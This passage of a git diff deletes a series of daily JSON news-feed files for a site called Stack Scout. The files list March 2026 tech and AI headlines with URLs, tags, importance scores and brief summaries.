"Show HN: Pgit – A Git-like CLI backed by PostgreSQL", - "url": "https://oseifert.ch/blog/building-pgit", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-17T06:11:17.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Hacker News archive (47M+ items, 11.6GB) as Parquet, updated every 5m", - "url": "https://huggingface.co/datasets/open-index/hacker-news", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7, - "date": "2026-03-14T17:12:03.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Measuring progress toward AGI: A cognitive framework", - "url": "https://blog.google/innovation-and-ai/models-and-research/google-deepmind/measuring-agi-cognitive-framework/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.61, - "date": "2026-03-18T11:44:44.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-19.json b/data/news-feed-2026-03-19.json deleted file mode 100644 index d4b456d..0000000 --- a/data/news-feed-2026-03-19.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.270Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-19", - "article_count": 5, - "archived_story_count": 98, - "articles": [ - { - "title": "Multiverse Computing pushes its compressed AI models into the mainstream", - "url": "https://techcrunch.com/2026/03/19/multiverse-computing-pushes-its-compressed-ai-models-into-the-mainstream/", - "source": "TechCrunch AI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-03-19T08:00:00.000Z", - "summary": "After compressing models from major AI labs, 
including OpenAI, Meta, DeepSeek, and Mistral AI, Multiverse Computing has launched both an app that showcases the capabilities of its compressed models and an API that makes them more widely available.", - "category": "ai_tools" - }, - { - "title": "DoorDash launches a new ‘Tasks’ app that pays couriers to submit videos to train AI", - "url": "https://techcrunch.com/2026/03/19/doordash-launches-a-new-tasks-app-that-pays-couriers-to-submit-videos-to-train-ai/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9099999999999999, - "date": "2026-03-19T16:14:00.000Z", - "summary": "Delivery couriers will be able to earn money by completing activities like filming everyday tasks or recording themselves speaking in another language.", - "category": "ai_tools" - }, - { - "title": "Hyper-optimized reverse geocoding API", - "url": "https://github.com/traccar/traccar-geocoder", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.7599999999999999, - "date": "2026-03-19T14:38:51.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Framework doesn't matter", - "url": "https://cemrehancavdar.com/2026/02/19/your-framework-may-not-matter/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7599999999999999, - "date": "2026-03-14T22:14:26.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Cook: A simple CLI for orchestrating Claude Code", - "url": "https://rjcorwin.github.io/cook/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.6499999999999999, - "date": "2026-03-19T02:20:34.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-20.json b/data/news-feed-2026-03-20.json deleted 
file mode 100644 index c4f0a1c..0000000 --- a/data/news-feed-2026-03-20.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.431Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-20", - "article_count": 6, - "archived_story_count": 82, - "articles": [ - { - "title": "OpenCode – Open source AI coding agent", - "url": "https://opencode.ai/", - "source": "Hacker News", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 0.76, - "date": "2026-03-20T21:03:52.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "My AI Agent ‘Cofounder’ Conquered LinkedIn. Then It Got Banned", - "url": "https://www.wired.com/story/linkedin-invited-my-ai-cofounder-to-give-a-corporate-talk-then-banned-it/", - "source": "Wired AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-03-20T10:00:00.000Z", - "summary": "When social media is constantly pushing people to use AI, why not let AI agents participate?", - "category": "ai_tools" - }, - { - "title": "Trump’s AI framework targets state laws, shifts child safety burden to parents", - "url": "https://techcrunch.com/2026/03/20/trumps-ai-framework-targets-state-laws-shifts-child-safety-burden-to-parents/", - "source": "TechCrunch AI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.9099999999999999, - "date": "2026-03-20T16:14:04.000Z", - "summary": "Trump’s AI framework pushes federal preemption of state laws, emphasizes innovation, and shifts responsibility for child safety toward parents while laying out lighter-touch rules for tech companies.", - "category": "ai_tools" - }, - { - "title": "Show HN: We built a terminal-only Bluesky / AT Proto client written in Fortran", - "url": "https://github.com/FormerLab/fortransky", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - 
"matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-20T22:06:51.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Sonar – A tiny CLI to see and kill whatever's running on localhost", - "url": "https://github.com/RasKrebs/sonar", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-20T09:59:56.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: An open-source safety net for home hemodialysis", - "url": "https://safehemo.com/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-17T00:48:15.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-21.json b/data/news-feed-2026-03-21.json deleted file mode 100644 index c72119d..0000000 --- a/data/news-feed-2026-03-21.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.597Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-21", - "article_count": 7, - "archived_story_count": 80, - "articles": [ - { - "title": "Apple Announces New Mac Sales Record Following MacBook Neo Launch", - "url": "https://www.macrumors.com/2026/03/20/apple-shares-mac-sales-achievement/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9, - "date": "2026-03-21T15:59:42.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Mamba-3", - "url": "https://www.together.ai/blog/mamba-3", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.87, - "date": "2026-03-17T00:00:00.000Z", - "summary": "Meet Mamba-3: the SSM built for inference. 
Faster than Transformers at decode, stronger than Mamba-2, and open-source from day one.", - "category": "tech_general" - }, - { - "title": "Iran launched unsuccessful attack on UK's Diego Garcia", - "url": "https://www.bbc.com/news/articles/c5yljdgwppzo", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.84, - "date": "2026-03-21T14:54:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Termcraft – terminal-first 2D sandbox survival in Rust", - "url": "https://github.com/pagel-s/termcraft", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-21T18:42:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Atuin v18.13 – better search, a PTY proxy, and AI for your shell", - "url": "https://blog.atuin.sh/atuin-v18-13/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-21T10:35:20.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "purl: a curl-esque CLI for making HTTP requests that require payment", - "url": "https://www.purl.dev/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-21T02:09:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Floci – A free, open-source local AWS emulator", - "url": "https://github.com/hectorvent/floci", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-21T21:49:15.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-22.json b/data/news-feed-2026-03-22.json deleted file mode 100644 index 0aac51b..0000000 --- 
a/data/news-feed-2026-03-22.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.763Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-22", - "article_count": 7, - "archived_story_count": 88, - "articles": [ - { - "title": "Elon Musk unveils chip manufacturing plans for SpaceX and Tesla", - "url": "https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-22T16:20:00.000Z", - "summary": "Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising.", - "category": "ai_tools" - }, - { - "title": "Show HN: A Markdown file that turns your AI agent into an autonomous researcher", - "url": "https://github.com/krzysztofdudek/ResearcherSkill", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.9199999999999999, - "date": "2026-03-22T18:21:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab", - "url": "https://www.royalbhati.com/hoptab", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7599999999999999, - "date": "2026-03-22T06:23:59.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Training Center for Maneuvering on Manned Model Ships", - "url": "https://www.portrevel.com/", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.7599999999999999, - "date": "2026-03-20T12:04:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "$ teebot.dev – from terminal to tee in 6 seconds", - "url": 
"https://teebot.dev", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-22T12:22:50.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "How to Attract AI Bots to Your Open Source Project", - "url": "https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-21T20:58:01.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Node.js worker threads are problematic, but they work great for us", - "url": "https://www.inngest.com/blog/node-worker-threads", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-18T16:51:51.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-23.json b/data/news-feed-2026-03-23.json deleted file mode 100644 index ad4a6fb..0000000 --- a/data/news-feed-2026-03-23.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "generated": "2026-06-05T00:44:29.984Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-23", - "article_count": 3, - "archived_story_count": 82, - "articles": [ - { - "title": "The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy", - "url": "https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/", - "source": "MIT Tech Review AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.8800000000000001, - "date": "2026-03-23T12:17:33.000Z", - "summary": "This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. 
The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in…", - "category": "ai_research" - }, - { - "title": "Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful", - "url": "https://github.com/oguzbilgic/agent-kernel", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.78, - "date": "2026-03-23T07:06:42.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y", - "url": "https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-20T13:21:51.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-24.json b/data/news-feed-2026-03-24.json deleted file mode 100644 index 4770e19..0000000 --- a/data/news-feed-2026-03-24.json +++ /dev/null @@ -1,145 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.177Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-24", - "article_count": 9, - "archived_story_count": 101, - "articles": [ - { - "title": "Google TV’s new Gemini features keep fans updated on sports teams and more", - "url": "https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/", - "source": "TechCrunch AI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-03-24T19:12:11.000Z", - "summary": "Three Gemini-powered features are coming to your Google TV. 
This includes visual responses, deep dives, and sports briefs.", - "category": "ai_tools" - }, - { - "title": "OpenAI adds open source tools to help developers build for teen safety", - "url": "https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/", - "source": "TechCrunch AI", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.94, - "date": "2026-03-24T18:41:34.000Z", - "summary": "Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build.", - "category": "ai_tools" - }, - { - "title": "Sunsetting the Techempower Framework Benchmarks", - "url": "https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.82, - "date": "2026-03-24T01:54:03.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Self-propagating malware poisons open source software and wipes Iran-based machines", - "url": "https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/", - "source": "Ars Technica AI", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7599999999999999, - "date": "2026-03-24T12:38:09.000Z", - "summary": "Development houses: It's time to check your networks for infections.", - "category": "tech_general" - }, - { - "title": "Qite.js – Frontend framework for people who hate React and love HTML", - "url": "https://qitejs.qount25.dev", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7599999999999999, - "date": "2026-03-19T13:49:12.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Nanobrew: The fastest macOS package manager compatible with brew", 
- "url": "https://nanobrew.trilok.ai/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-24T11:40:21.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "A retro terminal music player inspired by Winamp", - "url": "https://github.com/bjarneo/cliamp", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-23T20:42:22.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Gridland: make terminal apps that also run in the browser", - "url": "https://www.gridland.io/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-24T16:57:47.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Log File Viewer for the Terminal", - "url": "https://lnav.org/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.62, - "date": "2026-03-24T05:32:53.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-25.json b/data/news-feed-2026-03-25.json deleted file mode 100644 index d98f4ec..0000000 --- a/data/news-feed-2026-03-25.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.352Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-25", - "article_count": 7, - "archived_story_count": 95, - "articles": [ - { - "title": "Google launches Lyria 3 Pro music generation model", - "url": "https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-25T16:37:43.000Z", - "summary": "Google is 
launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools across Gemini, enterprise products, and other services.", - "category": "ai_tools" - }, - { - "title": "Meta launches new initiative to support entrepreneurship, drive AI adoption", - "url": "https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-03-25T14:45:20.000Z", - "summary": "Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space.", - "category": "ai_tools" - }, - { - "title": "Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’", - "url": "https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.77, - "date": "2026-03-25T20:38:45.000Z", - "summary": "Google’s TurboQuant has the internet joking about Pied Piper from HBO's \"Silicon Valley.\" The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now.", - "category": "ai_tools" - }, - { - "title": "Building a coding agent in Swift from scratch", - "url": "https://github.com/ivan-magda/swift-claude-code", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.7, - "date": "2026-03-25T10:45:40.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: DuckDB community extension 
for prefiltered HNSW using ACORN-1", - "url": "https://github.com/cigrainger/duckdb-hnsw-acorn", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-25T03:28:04.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Rendering complex scripts in terminal and OSC 66", - "url": "https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-22T09:31:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Open source isn't a tip jar – it's time to charge for access", - "url": "https://www.theregister.com/2026/03/25/open_source_bill_opinion/", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-25T11:59:36.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-26.json b/data/news-feed-2026-03-26.json deleted file mode 100644 index 9ea7028..0000000 --- a/data/news-feed-2026-03-26.json +++ /dev/null @@ -1,119 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.591Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-26", - "article_count": 7, - "archived_story_count": 95, - "articles": [ - { - "title": "Cohere launches an open source voice model specifically for transcription", - "url": "https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-03-26T13:30:00.000Z", - "summary": "Relatively light at just 2 billion parameters, the model is meant for use with 
consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages.", - "category": "ai_tools" - }, - { - "title": "Mistral releases a new open source model for speech generation", - "url": "https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-03-26T11:30:00.000Z", - "summary": "The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI.", - "category": "ai_tools" - }, - { - "title": "Intel Announces Arc Pro B70 and Arc Pro B65 GPUs", - "url": "https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9199999999999999, - "date": "2026-03-26T14:36:04.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer", - "url": "https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.78, - "date": "2026-03-26T22:41:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Relay – The open-source Claude Cowork for OpenClaw", - "url": "https://github.com/SeventeenLabs/relay", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.71, - "date": "2026-03-26T10:23:12.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Stripe Projects: Provision and manage services from the CLI", - "url": 
"https://projects.dev/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-26T16:00:57.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Shell Tricks That Make Life Easier (and Save Your Sanity)", - "url": "https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-26T00:28:38.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-27.json b/data/news-feed-2026-03-27.json deleted file mode 100644 index f1338e9..0000000 --- a/data/news-feed-2026-03-27.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.771Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-27", - "article_count": 5, - "archived_story_count": 86, - "articles": [ - { - "title": "Nashville library launches Memory Lab for digitizing home movies", - "url": "https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies", - "source": "Hacker News", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 0.84, - "date": "2026-03-24T04:22:15.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents", - "url": "https://github.com/outworked/outworked/releases/tag/v0.3.0", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.7699999999999999, - "date": "2026-03-27T17:25:05.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Telnyx package compromised on PyPI", - "url": 
"https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-27T18:13:57.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Telnyx package compromised on PyPI", - "url": "https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-27T08:57:02.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Minimalist library to generate SVG views of scientific data", - "url": "https://github.com/alefore/mini_svg/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-23T17:54:51.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-28.json b/data/news-feed-2026-03-28.json deleted file mode 100644 index aa285c8..0000000 --- a/data/news-feed-2026-03-28.json +++ /dev/null @@ -1,70 +0,0 @@ -{ - "generated": "2026-06-05T00:44:30.984Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-28", - "article_count": 4, - "archived_story_count": 67, - "articles": [ - { - "title": "Arm releases first in-house chip, with Meta as debut customer", - "url": "https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9199999999999999, - "date": "2026-03-24T23:34:06.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Improving personal tax filing with Claude CLI and Obsidian", - "url": 
"https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.73, - "date": "2026-03-28T18:21:52.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Improved Git Diffs with Delta, Fzf and a Little Shell Scripting", - "url": "https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7, - "date": "2026-03-24T15:02:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenCiv1 – open-source rewrite of Civ1", - "url": "https://github.com/rajko-horvat/OpenCiv1", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6799999999999999, - "date": "2026-03-28T18:22:45.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-29.json b/data/news-feed-2026-03-29.json deleted file mode 100644 index b79c584..0000000 --- a/data/news-feed-2026-03-29.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.207Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-29", - "article_count": 3, - "archived_story_count": 57, - "articles": [ - { - "title": "Figma's MCP Update Reflects a Larger Industry Shift", - "url": "https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal", - "source": "Hacker News", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 0.8200000000000001, - "date": "2026-03-29T15:46:26.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenYak – An open-source Cowork that runs any model and owns your filesystem", - "url": "https://github.com/openyak/desktop", - "source": "Hacker News", - 
"tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.82, - "date": "2026-03-29T04:26:13.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Pretext: TypeScript library for multiline text measurement and layout", - "url": "https://github.com/chenglou/pretext", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7, - "date": "2026-03-28T16:52:45.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-03-30.json b/data/news-feed-2026-03-30.json deleted file mode 100644 index 5e30e14..0000000 --- a/data/news-feed-2026-03-30.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "generated": "2026-06-05T00:44:31.348Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-03-30", - "article_count": 2, - "archived_story_count": 75, - "articles": [ - { - "title": "There are more AI health tools than ever—but how well do they work?", - "url": "https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/", - "source": "MIT Tech Review AI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.9099999999999999, - "date": "2026-03-30T16:00:00.000Z", - "summary": "Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. 
